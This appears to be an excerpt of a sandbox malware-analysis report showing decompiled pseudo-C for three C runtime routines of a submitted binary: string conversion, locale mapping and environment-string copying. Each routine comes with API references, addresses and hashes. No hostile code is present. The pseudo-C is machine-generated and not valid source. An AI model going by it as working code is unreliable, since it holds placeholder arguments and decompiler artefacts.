                                                                                                                                                                                                                                                                      			E0118C889(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                                                                                      				int _t58;
                                                                                                                                                                                                                                                                      				signed int _t60;
                                                                                                                                                                                                                                                                      				short* _t62;
                                                                                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                                                                                      				short* _t70;
                                                                                                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                                                                                                      				int _t78;
                                                                                                                                                                                                                                                                      				short* _t81;
                                                                                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                                                                                      				signed int _t90;
                                                                                                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                                                                                                      				void* _t96;
                                                                                                                                                                                                                                                                      				int _t98;
                                                                                                                                                                                                                                                                      				short* _t101;
                                                                                                                                                                                                                                                                      				int _t103;
                                                                                                                                                                                                                                                                      				signed int _t106;
                                                                                                                                                                                                                                                                      				short* _t107;
                                                                                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                                                                                      				_t49 =  *0x121dd74; // 0x2bc0e270
                                                                                                                                                                                                                                                                      				_v8 = _t49 ^ _t106;
                                                                                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                                                                                      				_t103 = _a20;
                                                                                                                                                                                                                                                                      				if(_t103 > 0) {
                                                                                                                                                                                                                                                                      					_t78 = E0118D79E(_a16, _t103);
                                                                                                                                                                                                                                                                      					_t110 = _t78 - _t103;
                                                                                                                                                                                                                                                                      					_t4 = _t78 + 1; // 0x1
                                                                                                                                                                                                                                                                      					_t103 = _t4;
                                                                                                                                                                                                                                                                      					if(_t110 >= 0) {
                                                                                                                                                                                                                                                                      						_t103 = _t78;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t98 = _a32;
                                                                                                                                                                                                                                                                      				if(_t98 == 0) {
                                                                                                                                                                                                                                                                      					_t98 =  *( *_a4 + 8);
                                                                                                                                                                                                                                                                      					_a32 = _t98;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                                                                                                                                                                                                                      				_v12 = _t54;
                                                                                                                                                                                                                                                                      				if(_t54 == 0) {
                                                                                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                                                                                      					return E0118DC5F(_v8 ^ _t106);
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t95 = _t54 + _t54;
                                                                                                                                                                                                                                                                      					_t85 = _t95 + 8;
                                                                                                                                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                                                                                                                                                                                                                      						_t81 = 0;
                                                                                                                                                                                                                                                                      						__eflags = 0;
                                                                                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                                                                                      						if(_t81 == 0) {
                                                                                                                                                                                                                                                                      							L36:
                                                                                                                                                                                                                                                                      							_t105 = 0;
                                                                                                                                                                                                                                                                      							L37:
                                                                                                                                                                                                                                                                      							E0118A61A(_t81);
                                                                                                                                                                                                                                                                      							goto L38;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                                                                                                                                                                                                                      						_t121 = _t58;
                                                                                                                                                                                                                                                                      						if(_t58 == 0) {
                                                                                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t100 = _v12;
                                                                                                                                                                                                                                                                      						_t60 = E0118A9E8(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                      						_t105 = _t60;
                                                                                                                                                                                                                                                                      						if(_t105 == 0) {
                                                                                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						if((_a12 & 0x00000400) == 0) {
                                                                                                                                                                                                                                                                      							_t96 = _t105 + _t105;
                                                                                                                                                                                                                                                                      							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                                      							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      							__eflags = _t87 & _t60;
                                                                                                                                                                                                                                                                      							if((_t87 & _t60) == 0) {
                                                                                                                                                                                                                                                                      								_t101 = 0;
                                                                                                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                                                                                                      								L30:
                                                                                                                                                                                                                                                                      								__eflags = _t101;
                                                                                                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                                                                                                      									L35:
                                                                                                                                                                                                                                                                      									E0118A61A(_t101);
                                                                                                                                                                                                                                                                      									goto L36;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t62 = E0118A9E8(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                                                                                                                                                                                                                      								__eflags = _t62;
                                                                                                                                                                                                                                                                      								if(_t62 == 0) {
                                                                                                                                                                                                                                                                      									goto L35;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                                                                                      								__eflags = _a28;
                                                                                                                                                                                                                                                                      								if(_a28 != 0) {
                                                                                                                                                                                                                                                                      									_push(_a28);
                                                                                                                                                                                                                                                                      									_push(_a24);
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                                                                                                                                                                                                                      								__eflags = _t105;
                                                                                                                                                                                                                                                                      								if(_t105 != 0) {
                                                                                                                                                                                                                                                                      									E0118A61A(_t101);
                                                                                                                                                                                                                                                                      									goto L37;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									goto L35;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t90 = _t96 + 8;
                                                                                                                                                                                                                                                                      							__eflags = _t96 - _t90;
                                                                                                                                                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      							_t66 = _t60 & _t90;
                                                                                                                                                                                                                                                                      							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                                      							__eflags = _t66 - 0x400;
                                                                                                                                                                                                                                                                      							if(_t66 > 0x400) {
                                                                                                                                                                                                                                                                      								__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      								_t101 = E0118BD19(_t87, _t66 & _t87);
                                                                                                                                                                                                                                                                      								_pop(_t87);
                                                                                                                                                                                                                                                                      								__eflags = _t101;
                                                                                                                                                                                                                                                                      								if(_t101 == 0) {
                                                                                                                                                                                                                                                                      									goto L35;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								 *_t101 = 0xdddd;
                                                                                                                                                                                                                                                                      								L28:
                                                                                                                                                                                                                                                                      								_t101 =  &(_t101[4]);
                                                                                                                                                                                                                                                                      								goto L30;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      							E0118E270();
                                                                                                                                                                                                                                                                      							_t101 = _t107;
                                                                                                                                                                                                                                                                      							__eflags = _t101;
                                                                                                                                                                                                                                                                      							if(_t101 == 0) {
                                                                                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							 *_t101 = 0xcccc;
                                                                                                                                                                                                                                                                      							goto L28;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t70 = _a28;
                                                                                                                                                                                                                                                                      						if(_t70 == 0) {
                                                                                                                                                                                                                                                                      							goto L37;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t125 = _t105 - _t70;
                                                                                                                                                                                                                                                                      						if(_t105 > _t70) {
                                                                                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t71 = E0118A9E8(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                                                                                                                                                                                                                      						_t105 = _t71;
                                                                                                                                                                                                                                                                      						if(_t71 != 0) {
                                                                                                                                                                                                                                                                      							goto L37;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      					_t72 = _t54 & _t95 + 0x00000008;
                                                                                                                                                                                                                                                                      					_t85 = _t95 + 8;
                                                                                                                                                                                                                                                                      					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                                      						__eflags = _t95 - _t85;
                                                                                                                                                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      						_t81 = E0118BD19(_t85, _t72 & _t85);
                                                                                                                                                                                                                                                                      						_pop(_t85);
                                                                                                                                                                                                                                                                      						__eflags = _t81;
                                                                                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *_t81 = 0xdddd;
                                                                                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                                                                                      						_t81 =  &(_t81[4]);
                                                                                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                      					E0118E270();
                                                                                                                                                                                                                                                                      					_t81 = _t107;
                                                                                                                                                                                                                                                                      					if(_t81 == 0) {
                                                                                                                                                                                                                                                                      						goto L36;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *_t81 = 0xcccc;
                                                                                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}


























                                                                                                                                                                                                                                                                      0x0118c88e
                                                                                                                                                                                                                                                                      0x0118c88f
                                                                                                                                                                                                                                                                      0x0118c890
                                                                                                                                                                                                                                                                      0x0118c897
                                                                                                                                                                                                                                                                      0x0118c89b
                                                                                                                                                                                                                                                                      0x0118c89c
                                                                                                                                                                                                                                                                      0x0118c8a2
                                                                                                                                                                                                                                                                      0x0118c8a8
                                                                                                                                                                                                                                                                      0x0118c8ae
                                                                                                                                                                                                                                                                      0x0118c8b1
                                                                                                                                                                                                                                                                      0x0118c8b1
                                                                                                                                                                                                                                                                      0x0118c8b4
                                                                                                                                                                                                                                                                      0x0118c8b6
                                                                                                                                                                                                                                                                      0x0118c8b6
                                                                                                                                                                                                                                                                      0x0118c8b4
                                                                                                                                                                                                                                                                      0x0118c8b8
                                                                                                                                                                                                                                                                      0x0118c8bd
                                                                                                                                                                                                                                                                      0x0118c8c4
                                                                                                                                                                                                                                                                      0x0118c8c7
                                                                                                                                                                                                                                                                      0x0118c8c7
                                                                                                                                                                                                                                                                      0x0118c8e3
                                                                                                                                                                                                                                                                      0x0118c8e9
                                                                                                                                                                                                                                                                      0x0118c8ee
                                                                                                                                                                                                                                                                      0x0118ca81
                                                                                                                                                                                                                                                                      0x0118ca94
                                                                                                                                                                                                                                                                      0x0118c8f4
                                                                                                                                                                                                                                                                      0x0118c8f4
                                                                                                                                                                                                                                                                      0x0118c8f7
                                                                                                                                                                                                                                                                      0x0118c8fc
                                                                                                                                                                                                                                                                      0x0118c900
                                                                                                                                                                                                                                                                      0x0118c954
                                                                                                                                                                                                                                                                      0x0118c954
                                                                                                                                                                                                                                                                      0x0118c956
                                                                                                                                                                                                                                                                      0x0118c958
                                                                                                                                                                                                                                                                      0x0118ca76
                                                                                                                                                                                                                                                                      0x0118ca76
                                                                                                                                                                                                                                                                      0x0118ca78
                                                                                                                                                                                                                                                                      0x0118ca79
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118ca7f
                                                                                                                                                                                                                                                                      0x0118c969
                                                                                                                                                                                                                                                                      0x0118c96f
                                                                                                                                                                                                                                                                      0x0118c971
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118c977
                                                                                                                                                                                                                                                                      0x0118c989
                                                                                                                                                                                                                                                                      0x0118c98e
                                                                                                                                                                                                                                                                      0x0118c992
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118c99f
                                                                                                                                                                                                                                                                      0x0118c9d9
                                                                                                                                                                                                                                                                      0x0118c9dc
                                                                                                                                                                                                                                                                      0x0118c9df
                                                                                                                                                                                                                                                                      0x0118c9e1
                                                                                                                                                                                                                                                                      0x0118c9e3
                                                                                                                                                                                                                                                                      0x0118c9e5
                                                                                                                                                                                                                                                                      0x0118ca31
                                                                                                                                                                                                                                                                      0x0118ca31
                                                                                                                                                                                                                                                                      0x0118ca33
                                                                                                                                                                                                                                                                      0x0118ca33
                                                                                                                                                                                                                                                                      0x0118ca35
                                                                                                                                                                                                                                                                      0x0118ca6f
                                                                                                                                                                                                                                                                      0x0118ca70
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118ca75
                                                                                                                                                                                                                                                                      0x0118ca49
                                                                                                                                                                                                                                                                      0x0118ca4e
                                                                                                                                                                                                                                                                      0x0118ca50
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118ca54
                                                                                                                                                                                                                                                                      0x0118ca55
                                                                                                                                                                                                                                                                      0x0118ca56
                                                                                                                                                                                                                                                                      0x0118ca59
                                                                                                                                                                                                                                                                      0x0118ca95
                                                                                                                                                                                                                                                                      0x0118ca98
                                                                                                                                                                                                                                                                      0x0118ca5b
                                                                                                                                                                                                                                                                      0x0118ca5b
                                                                                                                                                                                                                                                                      0x0118ca5c
                                                                                                                                                                                                                                                                      0x0118ca5c
                                                                                                                                                                                                                                                                      0x0118ca69
                                                                                                                                                                                                                                                                      0x0118ca6b
                                                                                                                                                                                                                                                                      0x0118ca6d
                                                                                                                                                                                                                                                                      0x0118ca9e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118ca6d
                                                                                                                                                                                                                                                                      0x0118c9e7
                                                                                                                                                                                                                                                                      0x0118c9ea
                                                                                                                                                                                                                                                                      0x0118c9ec
                                                                                                                                                                                                                                                                      0x0118c9ee
                                                                                                                                                                                                                                                                      0x0118c9f0
                                                                                                                                                                                                                                                                      0x0118c9f3
                                                                                                                                                                                                                                                                      0x0118c9f8
                                                                                                                                                                                                                                                                      0x0118ca13
                                                                                                                                                                                                                                                                      0x0118ca15
                                                                                                                                                                                                                                                                      0x0118ca1f
                                                                                                                                                                                                                                                                      0x0118ca21
                                                                                                                                                                                                                                                                      0x0118ca22
                                                                                                                                                                                                                                                                      0x0118ca24
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118ca26
                                                                                                                                                                                                                                                                      0x0118ca2c
                                                                                                                                                                                                                                                                      0x0118ca2c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118ca2c
                                                                                                                                                                                                                                                                      0x0118c9fa
                                                                                                                                                                                                                                                                      0x0118c9fc
                                                                                                                                                                                                                                                                      0x0118ca00
                                                                                                                                                                                                                                                                      0x0118ca05
                                                                                                                                                                                                                                                                      0x0118ca07
                                                                                                                                                                                                                                                                      0x0118ca09
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118ca0b
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118ca0b
                                                                                                                                                                                                                                                                      0x0118c9a1
                                                                                                                                                                                                                                                                      0x0118c9a6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118c9ac
                                                                                                                                                                                                                                                                      0x0118c9ae
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118c9c5
                                                                                                                                                                                                                                                                      0x0118c9ca
                                                                                                                                                                                                                                                                      0x0118c9ce
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118c9d4
                                                                                                                                                                                                                                                                      0x0118c907
                                                                                                                                                                                                                                                                      0x0118c909
                                                                                                                                                                                                                                                                      0x0118c90b
                                                                                                                                                                                                                                                                      0x0118c913
                                                                                                                                                                                                                                                                      0x0118c932
                                                                                                                                                                                                                                                                      0x0118c934
                                                                                                                                                                                                                                                                      0x0118c93e
                                                                                                                                                                                                                                                                      0x0118c940
                                                                                                                                                                                                                                                                      0x0118c941
                                                                                                                                                                                                                                                                      0x0118c943
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118c949
                                                                                                                                                                                                                                                                      0x0118c94f
                                                                                                                                                                                                                                                                      0x0118c94f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118c94f
                                                                                                                                                                                                                                                                      0x0118c917
                                                                                                                                                                                                                                                                      0x0118c91b
                                                                                                                                                                                                                                                                      0x0118c920
                                                                                                                                                                                                                                                                      0x0118c924
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118c92a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118c92a

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,0118CADA,?,?,00000000), ref: 0118C8E3
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0118C91B
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0118CADA,?,?,00000000,?,?,?), ref: 0118C969
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0118CA00
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0118CADA,?,?,00000000,?), ref: 0118CA63
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 0118CA70
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BD19: RtlAllocateHeap.NTDLL(00000000,?,?,?,0118A5A1,00000000), ref: 0118BD4B
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 0118CA79
                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 0118CA9E
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                      • Opcode ID: 58e6099c432d252ba2ae356da144c8493f2afcdc4b46ca50ad8231af0049085c
                                                                                                                                                                                                                                                                      • Instruction ID: 58c3c177581042a740713ac0a64277350b2a7a0f23e1a932a10a941d73fb81e3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58e6099c432d252ba2ae356da144c8493f2afcdc4b46ca50ad8231af0049085c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4651D572A00216AFEB2DAE64DC41FEBBBA9EB51654F15C229FD15D7140EB34DC40CAA0
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32 ref: 0118AA3B
                                                                                                                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 0118AA59
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: String
                                                                                                                                                                                                                                                                      • String ID: LCMapStringEx
                                                                                                                                                                                                                                                                      • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                                                                      • Opcode ID: ecec5a56347590a953e8882b33e6efe64860f401b7194e494862790450ba2d5c
                                                                                                                                                                                                                                                                      • Instruction ID: d004cd39a1759230e88507d9ad5f144e029b0467c37ee92871056b5c29a5dac8
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecec5a56347590a953e8882b33e6efe64860f401b7194e494862790450ba2d5c
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C01133250020DBBCF1AAFA0ED05EAE7FA6EF18714F018159FE1526160CB768970EF90
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E01191D19(void* __ecx) {
                                                                                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                                                                                      				WCHAR* _t19;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                                                                                      				_t19 = GetEnvironmentStringsW();
                                                                                                                                                                                                                                                                      				if(_t19 != 0) {
                                                                                                                                                                                                                                                                      					_t12 = (E01191CE2(_t19) - _t19 >> 1) + (E01191CE2(_t19) - _t19 >> 1);
                                                                                                                                                                                                                                                                      					_t6 = E0118BD19(_t14, (E01191CE2(_t19) - _t19 >> 1) + (E01191CE2(_t19) - _t19 >> 1)); // executed
                                                                                                                                                                                                                                                                      					_t18 = _t6;
                                                                                                                                                                                                                                                                      					if(_t18 != 0) {
                                                                                                                                                                                                                                                                      						E0118EAF0(_t18, _t19, _t12);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					E0118A6DA(0);
                                                                                                                                                                                                                                                                      					FreeEnvironmentStringsW(_t19);
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t18 = 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t18;
                                                                                                                                                                                                                                                                      			}







                                                                                                                                                                                                                                                                      0x01191d19
                                                                                                                                                                                                                                                                      0x01191d23
                                                                                                                                                                                                                                                                      0x01191d27
                                                                                                                                                                                                                                                                      0x01191d38
                                                                                                                                                                                                                                                                      0x01191d3c
                                                                                                                                                                                                                                                                      0x01191d41
                                                                                                                                                                                                                                                                      0x01191d47
                                                                                                                                                                                                                                                                      0x01191d4c
                                                                                                                                                                                                                                                                      0x01191d51
                                                                                                                                                                                                                                                                      0x01191d56
                                                                                                                                                                                                                                                                      0x01191d5d
                                                                                                                                                                                                                                                                      0x01191d29
                                                                                                                                                                                                                                                                      0x01191d29
                                                                                                                                                                                                                                                                      0x01191d29
                                                                                                                                                                                                                                                                      0x01191d68

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 01191D1D
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01191D56
                                                                                                                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01191D5D
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2716640707-0
                                                                                                                                                                                                                                                                      • Opcode ID: 891a5652fb48edc4996a5e6104dbe7cb4a39bf9dc748f3b515e2bdc814086516
                                                                                                                                                                                                                                                                      • Instruction ID: 7ae4e5ba7567e2ed614d508f216af89a8971f87fba84999cafcfe8d7e99abd0b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 891a5652fb48edc4996a5e6104dbe7cb4a39bf9dc748f3b515e2bdc814086516
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BE0E5771099227BA62A32297C8C9AF2A48EFD25BC7250129F12482144AF21888245B1
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                      • Not Executed
